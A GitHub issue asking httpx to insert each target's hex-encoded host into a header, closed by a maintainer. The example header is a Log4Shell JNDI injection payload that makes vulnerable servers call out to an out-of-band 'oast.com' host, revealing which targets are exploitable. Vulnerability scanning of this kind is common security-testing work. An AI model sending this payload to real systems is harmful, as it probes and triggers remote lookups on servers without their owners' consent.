### ISSUE TITLE
Add url as part of the input for Header in httpx

### ISSUE THREAD

**Issue by cyal1** [projectdiscovery/httpx#1462]
Issue Description:

I've noticed that your tool httpx provides extensive functionality, and I'm curious to know if it's possible to achieve the following requirement.

Expected Outcome:

When sending a request using httpx, I would like to extract the host from the URL and include its HEX-encoded result as part of the input. Specifically, I aim to add the HEX-encoded host information to the request header using the -H option.

Example:

Assuming there is a URL: https://example.com/

```bash
echo https://example.com/ | httpx -H "User-Agent: ${jndi:ldap://hex($HOST).xxx.oast.com/a}"
```

I expect the request header to be as follows:

```http
GET / HTTP/1.1
Host: example.com
User-Agent: ${jndi:ldap://68747470733a2f2f6578616d706c652e636f6d2f.xxx.oast.com/a}
...
```
Questions
Is it possible to achieve this functionality in httpx?

Thank you for your time and assistance!

**Comment by dogancanbakir** [comment]
Closing this. Let us know if you have any questions!
